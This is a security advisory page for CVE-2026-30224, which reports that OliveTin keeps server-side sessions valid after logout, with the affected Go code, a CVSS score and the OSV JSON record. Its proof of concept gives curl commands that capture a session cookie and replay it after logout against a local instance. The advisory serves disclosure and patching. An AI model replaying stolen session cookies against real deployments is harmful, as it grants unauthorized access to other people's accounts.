GHSA-GQ2M-77HF-VWGH

Vulnerability from github – Published: 2026-03-05 20:53 – Updated: 2026-03-06 22:52
VLAI?
Summary
OliveTin Session Fixation: Logout Fails to Invalidate Server-Side Session
Details

Summary

OliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default ≈ 1 year).

An attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass.

This is a session management flaw that violates expected logout semantics.

Details

During logout:

// Logout only clears browser cookie
response.Header().Set("Set-Cookie", localCookie.String())

However, the server still accepts the session:

session := sessionStorage.Providers[provider].Sessions[sid]
...
return session

The SID is not deleted from sessionStorage.

Why vulnerable: Logout does not remove the SID from sessionStorage; old cookie is still accepted until expiry (~1 year).

File: api.go, sessions.go, local.go Lines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47 Behavior - Login → receive SID cookie - Logout → cookie cleared client-side - Replay old SID manually → still authenticated

Expected: - Logout invalidates session immediately

Actual: - Old SID remains usable until expiry

PoC

Minimal config

listenAddressSingleHTTPFrontend: 0.0.0.0:16642
authRequireGuestsToLogin: true

authLocalUsers:
  enabled: true
  users:
    - username: low
      usergroup: users
      password: "$argon2id$..."

actions:
  - title: Dummy
    id: dummy
    shell: "echo dummy"

Reproduction

Login and capture SID:

LOGIN=$(curl -i -X POST http://localhost:16642/api/LocalUserLogin \
  -H 'Content-Type: application/json' \
  -d '{"username":"low","password":"lowpass"}')

SID=$(printf '%s\n' "$LOGIN" | awk -F'[=;]' '/olivetin-sid-local/{print $2}')

Works before logout:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Logout:

curl -X POST http://localhost:16642/api/Logout \
  -H "Cookie: olivetin-sid-local=$SID"

Replay old cookie:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Result

User is still authenticated after logout.

Impact

Type:

Session Management Flaw

  • Logout Bypass
  • Session Replay

Risk: - Stolen cookies remain valid - Persistent unauthorized access - Users falsely believe logout ended the session

Attack scenarios: - Shared computers - XSS/session theft - Proxy logs - Malware/browser compromise

Severity ?
5.4 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/OliveTin/OliveTin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260304233115-d6a0abc3755d15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-30224"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-384",
      "CWE-613"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-05T20:53:08Z",
    "nvd_published_at": "2026-03-06T21:16:16Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nOliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default \u2248 1 year).\n\nAn attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass.\n\nThis is a session management flaw that violates expected logout semantics.\n\n### Details\nDuring logout:\n```\n// Logout only clears browser cookie\nresponse.Header().Set(\"Set-Cookie\", localCookie.String())\n```\nHowever, the server still accepts the session:\n```\nsession := sessionStorage.Providers[provider].Sessions[sid]\n...\nreturn session\n```\nThe SID is not deleted from sessionStorage.\n\nWhy vulnerable: Logout does not remove the SID from sessionStorage; old cookie is still accepted until expiry (~1 year).\n\nFile: [api.go](app://-/index.html?hostId=local#), [sessions.go](app://-/index.html?hostId=local#), [local.go](app://-/index.html?hostId=local#)\nLines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47\nBehavior\n- Login \u2192 receive SID cookie\n- Logout \u2192 cookie cleared client-side\n- Replay old SID manually \u2192 still authenticated\n\nExpected:\n- Logout invalidates session immediately\n\nActual:\n- Old SID remains usable until expiry\n\n### PoC\n\nMinimal config\n```\nlistenAddressSingleHTTPFrontend: 0.0.0.0:16642\nauthRequireGuestsToLogin: true\n\nauthLocalUsers:\n  enabled: true\n  users:\n    - username: low\n      usergroup: users\n      password: \"$argon2id$...\"\n\nactions:\n  - title: Dummy\n    id: dummy\n    shell: \"echo dummy\"\n```\n\n### Reproduction\n\nLogin and capture SID:\n```\nLOGIN=$(curl -i -X POST http://localhost:16642/api/LocalUserLogin \\\n  -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"username\":\"low\",\"password\":\"lowpass\"}\u0027)\n\nSID=$(printf \u0027%s\\n\u0027 \"$LOGIN\" | awk -F\u0027[=;]\u0027 \u0027/olivetin-sid-local/{print $2}\u0027)\n```\nWorks before logout:\n```\ncurl -X POST http://localhost:16642/api/WhoAmI \\\n  -H \"Cookie: olivetin-sid-local=$SID\"\n```\nLogout:\n```\ncurl -X POST http://localhost:16642/api/Logout \\\n  -H \"Cookie: olivetin-sid-local=$SID\"\n```\nReplay old cookie:\n```\ncurl -X POST http://localhost:16642/api/WhoAmI \\\n  -H \"Cookie: olivetin-sid-local=$SID\"\n```\nResult\n\nUser is still authenticated after logout.\n### Impact\nType:\n\nSession Management Flaw\n\n- Logout Bypass\n- Session Replay\n\nRisk:\n- Stolen cookies remain valid\n- Persistent unauthorized access\n- Users falsely believe logout ended the session\n\nAttack scenarios:\n- Shared computers\n- XSS/session theft\n- Proxy logs\n- Malware/browser compromise",
  "id": "GHSA-gq2m-77hf-vwgh",
  "modified": "2026-03-06T22:52:14Z",
  "published": "2026-03-05T20:53:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-gq2m-77hf-vwgh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30224"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/commit/d6a0abc3755d43107be1939567c52953bcbec3d5"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OliveTin/OliveTin"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OliveTin Session Fixation: Logout Fails to Invalidate Server-Side Session"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.